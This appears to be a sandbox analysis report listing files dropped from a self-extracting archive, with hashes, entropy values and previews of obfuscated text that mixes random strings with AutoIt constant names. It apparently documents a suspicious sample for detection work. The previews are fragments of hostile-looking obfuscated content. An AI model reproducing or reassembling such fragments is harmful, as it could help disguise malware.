                                      Preview:W85Ww46Z2VCUvKznFu109a06Xe5077p4E547zVyC58bm2v35zF25E3Sr58T51j46335dD22y28pgF3pPw11KV2E189fyD27Z5Yd94xPA0166EEZ2P09076..FileConstants UpDownConstants..80Pf707gt5nS4U6O6m1mKdEr78147x1Yx452785277Um2v91Z7J5w3001e..StructureConstants StructureConstants..CZ3ejb075E04R..FontConstants ComboConstants..Pk65zCdG9434V9i6RkCdQ5j63wV545iVh0Y79GT256W1V0QX909V1MA48a02gKV00G29hyZEDdS664R7881wF0a5f165m3149DP27Kx34jQQ6897uK9k85W5P526fy3H3166O48s83s6NLBy7zQc5..DateTimeConstants ComboConstants..N24FiNoh20S2S390Oo60AK5Oq33D280CzI5O0tX007yVnZn9n0y0m041p7195Ga9738..GuiDateTimePicker FontConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):553
                                      Entropy (8bit):5.5226825444736445
                                      Encrypted:false
                                      SSDEEP:12:G74NaaLVlQWLlcbHe3yQU5Gr7lBKcspa3CBBDwPrdSTRX/2PUPHcaeCQNi:G79aLVlQW5eejBr7lIcbCBBSdgRX+PUT
                                      MD5:0D76C9CB1869319E76A6580C69604257
                                      SHA1:27BDE805B163C43C51D9E0619CE51DC4CDA0443B
                                      SHA-256:874EB67F37D176BC5557F707087641F74BC89EBF220DAA37E6864A2009843FFF
                                      SHA-512:C4C13686C845A61663C768FC7AC4705D9078C6D136FF0D3DED43E0C2F1EC2412B733E4648F347F429096C0455DA704DF6E7F8FD4E0E29C70B9712F519C27A518
                                      Malicious:false
                                      Preview:i352XFj5R73n838Q4O8C80r226p21dg23ZA9Pw440A2u8KL12S12Wq74uFzF2Q9EwJUS5T22K70S7h7G75XMB7B7pAs5yp268R045i5NZY53l0K51Y914Crro6z976..UpDownConstants GuiDateTimePicker..J4qx813E7u82740u9o8n71UShI71ESeFp148Z4kB73..ButtonConstants ToolTipConstants..j39j748e7V..ToolbarConstants ToolbarConstants..Cd4Zh57bDbT6J7PQT879745224X7bg6E028199F5676SQ96ooIP52909J3l7250D59e7B297470Zl219RfGof9Jkc94291fbz21y7ZdfvA3S661U9hve..DateTimeConstants ColorConstants..1Tv7n7H51L36t76oo200V3456Bpy5Yv3q9T0D6Xg0io304M13H01K16PdJaPHq51l79303N9518757hnA..FontConstants ComboConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):111874
                                      Entropy (8bit):3.720029907971537
                                      Encrypted:false
                                      SSDEEP:1536:3wU1Zo3foIaXgwxInL+0wA67Td1uHSXeSXoWIcNIH0FIiVL32XclnW:5Zo3Ww7nLtzFH0uidmso
                                      MD5:EE0B6DCB2323FE5047DE83C300BE5C00
                                      SHA1:57510C2089062A35B49DCEFAD5F3552501698940
                                      SHA-256:8A7A595F49C43F8054F757A9FAE31D7D10177638ECA9D8060FC3A902A02785EA
                                      SHA-512:31D8AF76EF4B9992ADF5A4D78ED0C7231F35339EFA484D137519AB219EE76197669CBB18F1947D9A940E89A6A4655BA5D9757A68D604670F6134BAB83637358C
                                      Malicious:false
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):616
                                      Entropy (8bit):5.5919274491792095
                                      Encrypted:false
                                      SSDEEP:12:UEuXqQ22KSBP1cDTH8prVz1cKnkg3qx+wMPHX6lTFI36k5g13E38tGyYCZc:vAqQWS7cDTH8prV55nkg3qQvql+Kb1Ez
                                      MD5:AA51853AD474CAF396B71D76EAD8C14A
                                      SHA1:9642CE89534071356D8936E433DA468A894CA7AB
                                      SHA-256:CED926B2FD7087FE3F55C6AC0BF6F69643BD41664EF0CBF73C0CEF6F37DF2E2A
                                      SHA-512:8BE2F90D5E4F93F190933065001539F39AA6217FFAE337037D5B4CDDF028B6E64C9C9C27D43CD8133E7E6D57C3D1F3A89AD252E9E9902633FE7660111CD11B5F
                                      Malicious:false
                                      Preview:X8L2q59H42s4q0K73498I4caYXMM615C30O0X23p78..FontConstants TreeViewConstants..95075Yi4n3fdc8Fq1hr499c12H52B1BJsl792N97jcyiyE78t2U457ynzRQ2825yi4u..StructureConstants DateTimeConstants..4c26g6U63bu5y0g50lL65o80BaJntu7YyTxw9c1FgdJX8493k1WBX602k2T90w6R078g05KK4953Y1sp7I94lWNkU52o1Pup8C1F4O126b80Ltc1740..ColorConstants BorderConstants..Bw6n9PN6840540FDuRRkD5r..UpDownConstants ComboConstants..2V826591GFE603I23V805pjV7ob426w4vjKP2H54066605cF8Z37euVt90ym4c1WDD7b2hwAer3V7j7Vx7w257dJxa3pu9r89a1ECt8y2466P0V0E0eu1U344K9V35Q6SwG1l9HaVsNJQ871t8wHq1DzRt05Z47fq92m58Uza60WpCF007QZ1F8tY5..GuiDateTimePicker StructureConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):510
                                      Entropy (8bit):5.517685465810615
                                      Encrypted:false
                                      SSDEEP:12:wxI3wFxHcQ91GORov4rWt9EdCMMobSeORc:405QAgM4rW0tPb3gc
                                      MD5:3B87F8A73679F00EBB0F3A7C7B90A673
                                      SHA1:D98627E3F197171143C423DAEB59AA4E048D996C
                                      SHA-256:CCA32260AB795480D8E57E2EEF12F6ED7A19EFF48592C9B0A0A725AC23A70780
                                      SHA-512:D7D57CB735BF461E704048560F516B6C410BC0E5C9BD181AB27AC182BA37F9CB2AE3EFD3D239BE88C1B76578169B7026EF2E6AC22FCCC395FD1E5A2872C5CA92
                                      Malicious:false
                                      Preview:NB9H1P4g7I4wlNg59pr7I9d64WI22e6..BorderConstants BorderConstants..5ksEGn989u63H02tt15P408013b90fS868Qsvk279BPQXuQ7eEUKa610U0bymyL513eQM6H3989P18Ui636xAn2a3OVr3956z1pOB3..ColorConstants ButtonConstants..ig2SS0Y81Eg13at0k9k34TB03gUK6ud5S..FontConstants ComboConstants..w6M457503Rp2p0..ToolbarConstants StructureConstants..K4376nb7m1K1O16T28H8kvKB6A07O78157962127GVXq3bFAB82q339v4QVRIGQYj74WP9hxWC3IK8DdSTREHs6j201Y9g00u2054628q6G9AwNJv8100n86qo5hr6yI376t24hi7b7dvS39U7l9nK8..ToolbarConstants StructureConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):670
                                      Entropy (8bit):5.592606713769875
                                      Encrypted:false
                                      SSDEEP:12:kmbOBPTUcj51BGQUSL58ANRjPN2l0YEXUbib89a0ygaJq:O9TaCrQlDrbib89ByPJq
                                      MD5:867F44ADC5EAFA2E46B8025FEA340D70
                                      SHA1:1E71245C15F72EA6E519820E036FD32FDC0006E2
                                      SHA-256:9E526DB38BA70B50E71A98707A0D292B74577A2C8392DB2A7488BFA62C5263A0
                                      SHA-512:2C73F76F89E563E1855861AEFAFA3EEF7990B1433CA0A6BF0350D28261CA26A335BAADE132D6FBF0FBDDC64BCABA74137D85209DC51B3A4E75344E5E133378C1
                                      Malicious:false
                                      Preview:93w0j497yh38VkUfVu6131u2..DateTimeConstants TreeViewConstants..T05IGEg152847u149Z4y04900TvJ1ttIm6LQ697J6k6E3W8ePXU98B5F5Cpb8V49j0A8ZFnID7V452602Qk..BorderConstants DateTimeConstants..A401f0d2Yk1S4HkVr8548Ophf446P2Lx8409CsT8g5d41763Wvov0968x2qI3121Z186Z891P1bp98UHP9T1asA3YuOOc01uSUV64i..TreeViewConstants FileConstants..7A09Yz3E09123038278ix564rz655PDHs02W88z401kQ2P4W0Y12833U9x1E2h840dWI0L3B42696wekh92TK227ZexPTb41FI23434H7m3216HJ02d1n9NN333UtwZ3K5Sh6..ComboConstants BorderConstants..31n5IuiA09krbSt2Vd711C0Qqh7x93FOfk13aB8l37pMD4o6t39NN6v7f61749jT71Ga07e3Y9cCXU318Gy8n1f9fUo50U7OO54F0VPVNsF8q5o8Lk986234UKuPaD173Lr3Ik8Rya305XXi..StructureConstants ToolTipConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):565
                                      Entropy (8bit):5.579008606196203
                                      Encrypted:false
                                      SSDEEP:6:F2nX+luWhjeZhn+LWluQAxVUOd1hXoND1WDs6dBX/ZznpiRASvZq7BSc6iIfEqUR:FPuWQVLuHhC1WDVdBvJgRrq7BPKfEZ
                                      MD5:7DE3A12A6B90580EA356F948345FE9D7
                                      SHA1:6AFB6144330A0F4EC4F96FE33A7964D1652DB92B
                                      SHA-256:F33F8A54AE5D43DF50081A0A872EBCF501E471B8A1CEB918F1DF21FCD57781E9
                                      SHA-512:6BEB5D1855EE6FF9AFB7BEF1A08BE47AAB5026F9DF6C5D4075CDEEA17A15F6960AF1511ED543C1EF6B5A414658B1E2325553D5D38E58DB915D378A9B4764BAEC
                                      Malicious:false
                                      Preview:75KDF8YL7K3M6D93i35kW5OY2n5P8u2P2i2hLo57DZP30w2e30XO8N5..GuiDateTimePicker ComboConstants..ceqe87Xv4qtTpBj12k6bn9V8Yny6fq..ComboConstants DateTimeConstants..CWJ6y4NP0lA05KxwluKbSxV642cq51Lh..ToolTipConstants ToolTipConstants..6B8w740u01CMv7D2xCUo3U3O9Bz19Q083sTK853Fb057Mc2HeBc5nI6C8ISK3nS4av5rq047x4292BH71m74101J1T0U..ColorConstants BorderConstants..x1T42sM3tWF829CL0yyC0931x98507D482YuIRAI1a..ComboConstants TreeViewConstants..fK671qHE8faw403tPNq5bd68VG78B70Y8080Wt2F3wP5N393GV4ee1Wdj1L6C69GPp5kXt5X7096Z88n3cJbMTjLkO078J137Mhh..BorderConstants ButtonConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):533
                                      Entropy (8bit):5.596652661396827
                                      Encrypted:false
                                      SSDEEP:12:gFBdRBntPrBPwCkI+Qi0f2qG9jYdepXdf2y:mPVKCkI+RQ2qG9sduXN2y
                                      MD5:0115DBA59A3AF38E30DA2F5AA6C96F4E
                                      SHA1:2B5AFECD853E5B03B004F3B42A2ED19677F350E7
                                      SHA-256:E54258A3C5F6258EE9C66A172FBEFB1C414EE2701B1B8F674746B05CCE851FBF
                                      SHA-512:3D4F63A33A2FB17217ECB187B94D1A6FAD3E15805A89B42C67DE12A5CC020AF62034E406A535EBB41396DB2358AEEB1B03489C115A92B3B427C0C08A994E765B
                                      Malicious:false
                                      Preview:4J9c6M137L7a00K..FileConstants ToolTipConstants..8K0QV692TbwNWcxL8uG90R31uxY7ln54064Z0371657Q3599jF8q52tkD243trPqpJNUB4TceR8CKd260p1QEm7Z..TreeViewConstants TreeViewConstants..45mJmSAc1S7Cz4F01omE765U6uc91J2843PpZTB81g42lLGZG002XKe7Y190h73R8U1378O602z934817gw47e279H77831AyVc595224BcHJT53IiS7M42auh9Gch138N4MA0t7ZR795G4tcWbkj02f54S89rJi5dUlKy2..ToolbarConstants FontConstants..rd911j8Bw4633Ft9uK843H03B49wU4gH88G0S2289L4NQ75t93D38S9yjq2D71L1a0cY67526a0vd0j06y8x135k3f9n7d60l67SaE5D20kA44846bW6Wh15..ColorConstants DateTimeConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):661
                                      Entropy (8bit):5.616511330878746
                                      Encrypted:false
                                      SSDEEP:12:sLYnZZuKraBPwuo8B43u36Z/RcpUCAzcmzMwl22:sLI2Krajo8a3usROaciM8t
                                      MD5:82F446AE349917DD7DCD403AF18BAFAC
                                      SHA1:72970BD4AF23321134DA39AC452E28D31E219412
                                      SHA-256:CDD4DA4B65ABAFDCAC98AFE1080CDC549A074217EA67437A7311D0FF8F8862F4
                                      SHA-512:FAE4B9B118F9CAF74EA94334D014816C4B2AA4F4F3DB8E372C2A12DB49FD1D26E87808144724AACA22599F74B6B141FF288654B5C0F8511FEE580BD2BCAAAC55
                                      Malicious:false
                                      Preview:7b32s7e73Gg2Kv850O0..FileConstants GuiDateTimePicker..u0s4T0G8J6452194eG91E0fzfe5OYr3AAE6999rwsdUXo8F01La5t9zsg6ay3T8JlN1S03492U6jr70224pQ7X..ToolbarConstants TreeViewConstants..q5O0F9517p387j09z172wJqG80SGM1h6yC8zc8Z3..ToolbarConstants FileConstants..0OMyTi3O91H141680Q31VHB2jZX8f1Mp3kN80v6U18j59A487mK67Y078Q76m4y8830S2pR7Xj13063k752787q2..ColorConstants ButtonConstants..x116vRYO0hCsWef52482l10860525M50Ek15Z88wF7BcJAy69eiAAvb10ccYQ24R29bpR7X9M8U..ToolTipConstants GuiDateTimePicker..o49173G846njf8baQU86amvE4MuV126p4JfmdTW6V00j7mXi77a47g7A9Rw5O5631c3EY069rsH58Ju1I89iI9QKK4K8059uA2y743uV616496l5fZ018sOx3e4jl12DhAUp2GYD5..DateTimeConstants ButtonConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):617
                                      Entropy (8bit):5.585524949886685
                                      Encrypted:false
                                      SSDEEP:12:sySuCAwOQXJe18xeUP0rjDVcxqI0e4g0tFPIZUX9fxx8qnQ:stuCAlQc2eUPWjDViqNsE9VnQ
                                      MD5:C1D1C70A2088D6B655C9EBF6234B8014
                                      SHA1:E5BED845B8467B043CEFD3FFDF5A333AA9A0E3BA
                                      SHA-256:A53415B26AE088E51BCF047D4F56AC1C3A32F5953F498B5DD0F181FC8D0A609D
                                      SHA-512:ECB4C5B514B7AC155B34FBB5D2ACC1AF3260F6F34623C769599EEBBBD3709CC8DAD62CFB61F1D9E46E27DE5A98D083184D68A1888F8D52864D5BDD61B97B910C
                                      Malicious:false
                                      Preview:K7058D680663qQ2K308I4YY0Q88d54Z9h6x9q3K32989R5736H2by5w4tqm91Y4R75HdJ1Nf6K7N4sH974p164541e5hOkxo0n9t53nA215X55Ns..FontConstants ComboConstants..37vXW21S64zeg387Lp8y9mTEHw25474Y83B7w1rnbbZuqSJ6eNi5V7q88BHdyS25Y5e01x..ToolbarConstants BorderConstants..2Z5TE2iR5732Iuc6q6w0835c0T2spxtK1j25D58yN4d820c8J0er6ySBV9q0VAA532F3HdIGm0LXhGI6a0W220j483ECZdt9RF17e3eY41067d3L2na1I65Y420O333Z04k6972p8ha9468T9KOGw0m84D41Qij..TreeViewConstants BorderConstants..x737L4hw8F5Ag6AE6Q5J525XU8I2wr7fqZ957R18244135T9J9t05uGH6lR8xujbB7b2R3p7266LqKxhisLQgo074Y3aMf5kBw749E4DplZ0879d8l9dt43pLuX631Hy517235kp..ToolbarConstants ComboConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):610
                                      Entropy (8bit):5.472679932262326
                                      Encrypted:false
                                      SSDEEP:12:cM6bKRfqFJwOrnRsF70XnjRPPWXSiq0GGZjujQR60Kd4uvD9wJ:rPKnRs9aNPPWiiq0GctRQO2hwJ
                                      MD5:208B5D0B67FFD39189CB1E56F641A569
                                      SHA1:4B8151D25C424A62176AF7D99B27E02E962350F9
                                      SHA-256:3F5FB1AAE2DC3DF95033F74FA4214BA5806C8A3AA9F4784D2B02726F343B5B84
                                      SHA-512:59876ADFC0732347A324AED4C3373568FE77BDF82D7591B4F7508246DB20EE55E184F448DD8C29D1B1357DE442885856A7149F92EF9E06F060C3FC138F602D11
                                      Malicious:false
                                      Preview:z3Y2n8g49X19X31g11827q2kj0FjV1P2m8a3f10MB2u7z051Z54Lb8U9814nd0804017KV9YE33M82e31T7skA87o4M00108H089lvT7VYr32o723q8t9iE2072HA4v4m6U4q74..FontConstants ToolTipConstants..Sq0rDnE31m2ri7f5g077J272f1oXZ7719g64wm..DateTimeConstants ToolbarConstants..0fI062kn4559CeCc5n923m..UpDownConstants StructureConstants..4iFTr18i3853JHQ2m879to3uC78M7EP5Y52fQY2E323M7Jb420614S3s5g6l4kIpA..StructureConstants GuiDateTimePicker..079c6n2U0a6i2ts46g39U935iBvK2Q311I2K..StructureConstants DateTimeConstants..w25eru7rtY7ypAN8VtBJE8WPqlL59619BhEtc78b207vf62741MBcu6D92V5sz4sWB550838h36c13LwT78zo6EUhdv9..ColorConstants FontConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):583
                                      Entropy (8bit):5.606894856346951
                                      Encrypted:false
                                      SSDEEP:12:ZQpqZY51BJ3NBrMXGj+jvcwNPSNmxOvT03J3W7DbxiiPI0:yLE4+zjNPrir7vxa0
                                      MD5:0B720996F08404C60BE94CDABC5F9263
                                      SHA1:6BDA9867FD28209F187591A0675C03F75B86DDE8
                                      SHA-256:50C0A1003F14144466D3EB55FBF96113032E1D0C169890301E22D4E6D6BB2D1F
                                      SHA-512:58F68B7BB83FF2B25EA6104ED1FF791BBD0B68BF6E2D182E15E1BFC669EDD9D6F080541F801F217D66AFD7B50C6A9C9F95B03065CD53134B33CF9CF22A9C1B53
                                      Malicious:false
                                      Preview:9mV826q9zAMGJ14708CT87fmcNOFk530L13485ib076985F2417rP0yZiQDuN8St70NX5q72U4Xsx22yf5o34t592156w553sz1J692urlXV4r9CGZ115RM8hAo1K062F2UP3..GuiDateTimePicker DateTimeConstants..C7n60w9Nf5385aOQRGQ1434H8ZAoUt93TW9w39248BN348UaaZSy00K60IQV7tQy86e3Qd220asJ6K..ColorConstants FontConstants..3ll5jR8JX7zb0R12b0AK26V6nM5Gi50Xl913owK2Ly4t3wB6D3jo0RiJ465g5TzHv9n10s4w3..DateTimeConstants DateTimeConstants..LLU4J22Sk28972J5t996809D..GuiDateTimePicker ColorConstants..2L6uMOt5O12MfDln75ejWq27d9x3478ZJ5PcMu3z4198L5EJ57jaWaGYM004MW6bHO2Y5q70Y19V81gsJzmG4H387611..TreeViewConstants BorderConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (420), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):89890
                                      Entropy (8bit):3.0340576559820898
                                      Encrypted:false
                                      SSDEEP:192:IkkkkkkkkkkkkLhkkkkkkkkkkkkWkkkkkkkkkkkkskkkkkkkkkkkkRxkkkkkkkkz:QdB
                                      MD5:9CC31F5D12CE4609EC12D092A028BB23
                                      SHA1:AE3C36DA54C2142A6DC0D2987AD518ACC850F803
                                      SHA-256:1FC30FCF18A2B46D9F3256F069598E0D622615FFC39CF57558BE2B398F59E31E
                                      SHA-512:6E921A8972D1689D48625A4DC9AF744382D0880D7768D6906580E87355CEF39C789CB746DEB93F2E457F2A8CF3A3E6159E001400317051BA8397AA4D635379F8
                                      Malicious:false
                                      Preview:..T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.T.e.l.e.V.r.a.m.(.1.1.5.).:.....T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.T.e.l.e.V.r.a.m.(.3.3.).:.....T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.V.r.a.m.(.1.0.8.).:.T.e.l.e.
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):34649
                                      Entropy (8bit):5.586154777776895
                                      Encrypted:false
                                      SSDEEP:768:lXC7WQmlFk5gviQr5HlfdIxNMan26hpqsQwlTZvqZEbb2B8n:lXC7wjia5HZduNN2McsQsSZj4
                                      MD5:55BC888147FD7CC3A422713F543596C8
                                      SHA1:748970FBC9A4F80714E0D4FD12D6209F60F2EC97
                                      SHA-256:FF7FC54EADE5736B5805B37BF827E5855A2F71E8D624665539368521A786A8D7
                                      SHA-512:66490BF66436F33B3FF20232E7A095C97F23CFC19C5E9FECBA436853F26ED7055CC3B9219F55B0329B5E656DE601A03FA9ECD9F2298FF44D2310BEAF5966F972
                                      Malicious:false
                                      Preview:k11085i47B098ipIZ397O713A9153F9TV9447A8O8H5my1y..BA7152R96q91a7Ny7hNqIB4d427iaCLIFQ5393u02rS8q72ANHu7v88k..88rO6w538B8928El4Gi1944cV8413542037a..gqPB82C4O682aa3175028f3I037dIV0G490O7g1nP6e4J0Ui79lOi..5zy39Xh71e2Yg5mUo4352696z62Z328xh572U0Iu7WN70G2Z35324Y6f8uys0CzMe7HbY5mETD8X5LqvEA7..u663LUeLk9pED0zkG579EK87H3k17LC8Uobwq892l6qU320039RM3a7Q630Cb2xoIj345w57i..C9ECu9v8729iLky2rf5eV9K8951598I2Mm0aG615HMO1041UV4c9971pVWd..Edd51cjqXrpUu5st46092f8n897YkhNHs610O171Iz590126NX1817wq95sh8CC57l62l3J7..0P6V19I106F862nX264qFA1Nu6h65mcl27471t664yPvL3QUg735OwV3EeX0a5K38Oe7ioC2834W69E3f8Zs09..1795L781Y4qRAKg847Hm8SDCZ1eu4W2ZF9ys83V04U..3gLjtM8TQ6p781y8zn69480UCd246020l6..wP71598C1900839D27X56Sps..1z9DJ7TbTs06r3Q6nbksStmb6Sfi42iF3PTC5r6L233gan..0E2g1B3Z22Ny6U01x804stYL74sc9oj..821csA8952KiM2B3G0E7E594b2Rqsk6xtl2Tis54sEJ3NWXZ4G24Rr3..ke3LB5QUZj4Qi5gDr4w79Cu..68J0w7300016B71m2O4R4Gn788pBV7N2VDNlY4P8b..q8f49e87377v52HW335d29k12gJ7e6908FO33EbBE2eAn00sK9x0T095..p4i8N7f44723O74z5ie66333f1dY4h0122H9k785o489C7i
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):578
                                      Entropy (8bit):5.55462349735179
                                      Encrypted:false
                                      SSDEEP:12:HgjxwyARG+OQkzPJxvqmsmguTt2FnPqfp/cMcuSf5aMwE8Rc:Hma6PJxvoJuT4FSx/cX5UEec
                                      MD5:BD024A03BEDCF16316AB8A1EC87ADAA6
                                      SHA1:0D7003B89301CCF8CDB326C3FCD98E96A60F1663
                                      SHA-256:1BCF4BA6AD5075F633662C184DE0E46B4E5764B70FFCF8840C48BE4679398560
                                      SHA-512:28294B36BA4AB7290010EA826952A4F82A06123987C84B3A91DB90B5AE7B6E538A407933A750AA4619F7D93449A721B648ECB7F256758ABB9FBFAC92C6ACF066
                                      Malicious:false
                                      Preview:92IMS0831753n1742846xcKi98352P20l3g47O5ZDW399nZ3m29Uxc8776oR4lYzAm009q..ColorConstants ComboConstants..79244Qv97071u88o1237p2J8493G0908Sd5J5o4779pOhuH7U4XnE1p0F17F897gWg05j2g4pQ..BorderConstants ColorConstants..KfWc404R3PM8N81xlyh1WRs100d477r11Bes0ln48M3pmr6eJ7803c141R70I3DaQ0s4Y9..ToolbarConstants ComboConstants..yd145r1VGKW045ArLepx6932WX1Q5Lqo356601609scn0RX0ccNGc41UZOrg9x089TImZ..TreeViewConstants GuiDateTimePicker..m4779it98iBSS2H41B3DZqR04pp0S3zpWI5A0Bh3C2Y93f5H07muh7E663vdnbI2J3m518HU118fT1YW656yg7WV1ksd16F64n363W35493a15nD783FNq..FontConstants StructureConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):506
                                      Entropy (8bit):5.616383312872459
                                      Encrypted:false
                                      SSDEEP:12:wCixLARfyJKz++SGUVxSKvKuE8R0RcdbgXsyy/UJ:wB+VsKSrVEKSuEeic2X6/UJ
                                      MD5:E167B220B80135A631F589043CA899B5
                                      SHA1:0E0850082F18334CD783DD174345934AED7221C5
                                      SHA-256:819EA1F99B61B3DC631F935EB6C5876034F373EB1EC4FEC2DB8873523696C518
                                      SHA-512:CC5FE2989BA6C3BCE2310C28D0398500436E65DB6B8EEA08387C99E5871E2AACBAE908A4B1C89B57EF1847A40FFEE82A1777B4577EB01E7235176566CA965C86
                                      Malicious:false
                                      Preview:4v826462174I5lWO87q6wXTVA0E49B3QnrKH2N7g11zT0u29S8ePHlTi7zW34Z43sD4wzvDa1oi4UO350og4m5816Ns54m8Fqzf8P6s16c8bTtx48d5X7W66N2VJ0u392M55eI16MDUL5I45d120LX38ru..ToolTipConstants BorderConstants..PZA2O6qX86c988XJ1519vG92kE5ig9iu6cN63Y819775T13S6kMC05aTUo4rD7W7360W1Xo2LI86c64gGp2F5s021Z4FAJm6vL0oBj9i19nSS974za8420R9QH0k2le..FontConstants StructureConstants..1d50bx51ta0851Ip0QK9C24Fk6i74462M4rxe147T2K78M68yRRW0ROzqxqgQ4q8Zt3e2fDmLMxK53K0sJ4hVF1Qkgp5R8W66e5X450B5T33k12p62eCO..StructureConstants FontConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):519
                                      Entropy (8bit):5.630465665150215
                                      Encrypted:false
                                      SSDEEP:12:jWMubVd2pSlVcmR9Sz2nf9+xTkRJx72COem0uc:VlSjFRNdbIZem0uc
                                      MD5:70C69AA9F7B1E888CA0714E89BE32098
                                      SHA1:4F4BB1D33E921CF93182936499BFDF16A96F7F97
                                      SHA-256:7ADB1E9738343F7EBE30EF6B7F6650FFFEE059EC22D98EBF17DC135E2C835B2F
                                      SHA-512:A01EB39E1FBC1A647D316264260B8C1748F1C49509342B04547B94BD09FDA4B26FA04AA6D10C799A1426AE69746A6A2383E6963CEBACF3E66194E295C13E686E
                                      Malicious:false
                                      Preview:o34Jj1t91U565ClVMKU1I5n2xfyn87qi2UB9zlU0X1mIwt0c0L6Q7e2J04875mn0620d2J269QAZp6eb9H2..DateTimeConstants GuiDateTimePicker..77654f..GuiDateTimePicker GuiDateTimePicker..T3041v39DD4mkVxX2Y8566G1v1h653q5N9G1gU0ETYJEfK8Z3h3088i9gO97o07594O4fX7vmV2KAcPQ0v8LI27vfQIcc8L62WkOLb26939dcVH5o2WP69O1L8D895mqg2V4h4O67fN810W0kegQUq255cEoB0kzM0Z5C3O23zOdd18..GuiDateTimePicker ComboConstants..33Hmaj5J68xO0L35m081004Ei5T5903S9Ja9u09252705gc6unJ89h8rYx67aJK1369AmGu0zw8bK2354g79n34t7m36XyN7dZ4c0..GuiDateTimePicker StructureConstants..
                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\cipkucw.ppt
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):551
                                      Entropy (8bit):5.464724766594262
                                      Encrypted:false
                                      SSDEEP:12:u/nl+yfdZlvaE2S0GjIAVSmf9lQLITUu7rBPuq1qy2Xva/XR:fyFbx2JyS69OLIhrrgP/SR
                                      MD5:F6DE4EFF7A4743ECFB4FE11E27DDE3B4
                                      SHA1:B451BE4E2C5A0873AD0A69D4855D75CB065A06BE
                                      SHA-256:2F77B1B7FE13AA79B41995F99BE0EF1B85B492C30B594DEAF0239257C72A5BFE
                                      SHA-512:0D0470CE4514A6A6951847AC61F5D09AB99E4B064FE4AD8E21A4F8AFED68D56BD996EDA5392AE6E8BE5C4824B884E85D76A4511872386873557D4730C5ABBE9C
                                      Malicious:false
